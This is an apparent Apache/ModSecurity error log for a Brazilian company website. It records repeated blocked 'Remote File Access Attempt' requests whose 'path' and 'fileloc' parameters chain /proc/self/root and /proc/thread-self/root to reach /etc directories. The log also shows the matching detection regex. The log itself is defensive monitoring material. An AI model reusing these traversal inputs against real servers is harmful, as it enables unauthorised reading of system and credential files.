[Wed Mar 18 10:52:13.391671 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:33660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquDeyqAr6etmhZHNrB8QAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:52:15.988258 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:49150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquD9Y0UrI5A3LftIyqYQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:52:17.302886 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:49160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquEew_le52K8_3pV3hYQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:52:25.660113 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:49828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquGSmAPhZkrhU8w4luzgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:52:35.458892 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:48582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquI9a6ubjKNq_cu4abtAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 10:52:39.046889 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:49814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquJ-oXxyEfFpUF8f9u_wAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:52:46.837562 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:55996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquLcdf6f5d65gmYZTW_gAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:53:19.459305 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.55:47976] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:53:19.565769 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:49162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquT8df6f5d65gmYZTXPQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:53:20.884429 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:58428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquUPu8EFLIOrSqIpsFqgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:53:23.083533 2026] [mime_magic:error] [pid 26799:tid 140411565680384] (70014)End of file found: [client 57.141.18.68:48102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:53:26.797085 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:37422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquVsdf6f5d65gmYZTXQgAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:53:34.495370 2026] [:error] [pid 11816:tid 140411641214720] [client 216.73.216.191:59658] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquXuw_le52K8_3pV3hkgAAAgw"]
[Wed Mar 18 10:53:44.282051 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:58448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquaOyqAr6etmhZHNrCQAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:53:52.238188 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:42320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqubwkwaGbbGflqUZASBAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:53:55.395469 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:35858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqucvu8EFLIOrSqIpsFyAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:54:02.609967 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:58982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquekzinOy1jxa1j4cXCQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:04.958458 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:45768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqufOyqAr6etmhZHNrCSgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:06.709258 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:45778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqufta6ubjKNq_cu4ab9AAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:09.867198 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:41810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqugQkwaGbbGflqUZASGwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:54:14.386571 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:45786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquhuyqAr6etmhZHNrCVwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:15.791213 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:40638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquh9Y0UrI5A3LftIyrHQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:19.163095 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:40650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqui9a6ubjKNq_cu4ab_gAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
